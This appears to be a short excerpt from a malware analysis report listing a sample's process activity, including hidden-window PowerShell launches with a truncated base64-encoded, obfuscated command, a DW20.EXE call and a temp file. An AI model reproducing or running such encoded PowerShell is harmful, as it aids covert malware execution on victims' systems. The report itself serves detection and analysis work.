Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAF8ANAB5AHcAdAB1AD0AKAAnAEUAJwArACcANwA4ACcAKwAoACcAbAAnACsAJwA1AG8AZgAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAdQBzAGUAUgBQAHIAbwBGAEkATABFAFwAcgBiAE...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1572
- %TEMP%\1194764.cvr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAF8ANAB5AHcAdAB1AD0AKAAnAEUAJwArACcANwA4ACcAKwAoACcAbAAnACsAJwA1AG8AZgAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAdQBzAGUAUgBQAHIAbwBGAEkATABFAFwAcgBiAE...' (with hidden window)